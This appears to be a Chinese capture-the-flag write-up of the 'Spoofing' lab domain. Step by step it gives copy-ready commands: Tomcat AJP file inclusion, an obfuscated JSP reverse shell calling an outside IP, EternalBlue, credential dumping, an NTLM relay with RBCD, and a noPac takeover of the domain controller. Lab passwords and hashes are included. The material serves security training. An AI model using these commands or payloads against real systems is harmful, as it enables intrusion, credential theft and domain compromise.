春秋云镜-Spoofing - WP
fscan扫描
39.98.115.177:22 open39.98.115.177:8009 open39.98.115.177:8080 openweb端全是404 开dirsearch扫目录
扫出一个/docs
Tomcat9.0.30
这个版本的Tomcat有ajp文件包含漏洞,刚好靶机又开了8009端口
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
python2 poc.py 39.98.115.177 -p 8009 -f /WEB-INF/web.xml得到
Getting resource at ajp13://39.98.115.177:8009/asdf----------------------------<!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd" ><web-app> <display-name>Archetype Created Web Application</display-name> <security-constraint> <display-name>Tomcat Server Configuration Security Constraint</display-name> <web-resource-collection> <web-resource-name>Protected Area</web-resource-name> <url-pattern>/upload/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <error-page> <error-code>404</error-code> <location>/404.html</location> </error-page> <error-page> <error-code>403</error-code> <location>/error.html</location> </error-page> <error-page> <exception-type>java.lang.Throwable</exception-type> <location>/error.html</location> </error-page> <servlet> <servlet-name>HelloServlet</servlet-name> <servlet-class>com.example.HelloServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>HelloServlet</servlet-name> <url-pattern>/HelloServlet</url-pattern> </servlet-mapping> <servlet> <display-name>LoginServlet</display-name> <servlet-name>LoginServlet</servlet-name> <servlet-class>com.example.LoginServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>LoginServlet</servlet-name> <url-pattern>/LoginServlet</url-pattern> </servlet-mapping> <servlet> <display-name>RegisterServlet</display-name> <servlet-name>RegisterServlet</servlet-name> <servlet-class>com.example.RegisterServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>RegisterServlet</servlet-name> <url-pattern>/RegisterServlet</url-pattern> </servlet-mapping> <servlet> <display-name>UploadTestServlet</display-name> <servlet-name>UploadTestServlet</servlet-name> <servlet-class>com.example.UploadTestServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>UploadTestServlet</servlet-name> <url-pattern>/UploadServlet</url-pattern> </servlet-mapping> <servlet> <display-name>DownloadFileServlet</display-name> <servlet-name>DownloadFileServlet</servlet-name> <servlet-class>com.example.DownloadFileServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>DownloadFileServlet</servlet-name> <url-pattern>/DownloadServlet</url-pattern> </servlet-mapping></web-app>UploadServlet是一个文件上传界面
写个反弹shell的txt,然后包含他
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Mi4xOTIuNDIuNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}").getInputStream();%>
python2 poc.py 39.98.115.177 -p 8009 -f upload/25069433eea324da0f3a2270845a3420/20231011113651365.txt然后发现弹不了,换一个exp
https://github.com/hypn0s/AJPy
python3 tomcat.py read_file -webapp=ROOT upload/4ea270cbc2f5958b57568f269404874e/20231011114651442.txt 39.98.115.177
直接是root,拿到第一个flag
上传fscan扫描
172.22.11.6 XIAORANG\XIAORANG-DC172.22.11.26 XIAORANG\XR-LCM3AE8B172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010172.22.11.76 (已拿下)即然是root又开了22端口,直接写个ssh私钥
然后将公钥的内容写入authorized_keys
echo "xxxx...." >> /root/.ssh/authorized_keyschmod 600 /root/.ssh/authorized_keys然后就可以连接ssh,直接搭个ssh隧道进行动态转发
ssh -i id_rsa -N -D 1050 root@39.98.115.177172.22.11.45有个MS17-010,直接拿msf打
use exploit/windows/smb/ms17_010_eternalbluesetg Proxies socks5:127.0.0.1:1050set payload windows/x64/meterpreter/bind_tcpset RHOSTS 172.22.11.45set lport 1433run
进去拿到第二个flag
load kiwicreds_all得到一个域用户和机器账户的凭证
同时得到yangmei的明文密码为xrihGHgoNZQ
可以打nopac
先添加机器账户
proxychains4 -q addcomputer.py xiaorang.lab/yangmei:xrihGHgoNZQ -computer-name TEST\$ -computer-pass 123456 -dc-host XIAORANG-DC.xiaorang.lab -dc-ip 172.22.11.6
加不了,估计设置了MAQ=0
扫描存在petitpotam
26开了web client
考虑 NTLM Relay over http
没AD CS打不了Shadow Credentials,可以打RBCD
用petitpotam让存在webclient的服务器携带ntlm对我们进行强制身份验证,再将验证中继到ldap获取机器账户身份修改机器账户身份的msDS-AllowedToActOnBehalfOfOtherIdentity为我们控制的机器账户的sid
虽然无法创建机器账户,但刚刚导出凭证已经拿到了XR-DESKTOP$的hash,用这个账户配RBCD就行
启动NTLM relay
proxychains4 -q ntlmrelayx.py -t ldap://172.22.11.6 --escalate-user 'XR-DESKTOP$' --delegate-access --no-dump添加DNS信息
proxychains4 -q bloodyAD -d xiaorang.lab -u yangmei -p xrihGHgoNZQ --host 172.22.11.6 add dnsRecord test 172.22.11.76
可以看到已经加上了
ssh远程端口转发,将本机(攻击者) 80 端口的流量转到远程172.22.11.76的81端口
ssh -i id_rsa -N -R 81:127.0.0.1:80 root@39.98.115.177但ssh进行远程端口转发时默认只监听127.0.0.1
使用 iox 将 0.0.0.0:80 的流量 转发到 127.0.0.1:81
iox fwd -l 80 -r 127.0.0.1:81
然后使用PetitPotam强制认证
proxychains4 -q python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab test/pwn.txt 172.22.11.26
此时完成了RBCD的配置
然后申请XR-DESKTOP cifs服务的ST票据
proxychains4 -q getST.py xiaorang.lab/'XR-DESKTOP$' -hashes ':4feda238ac28737160f577039b06b51e' -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate Administrator -dc-ip 172.22.11.6
加载票据
export KRB5CCNAME=Administrator.ccache然后就可以横移过去
proxychains4 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -dc-ip 172.22.11.6 -codec gbk
拿到第三个flag
smbclient传个mimikatz过去
proxychains4 smbclient.py XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26
抓到zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1
他是有权限添加机器账户的
直接拿他打nopac
proxychains4 -q python3 noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
拿下最后一个flag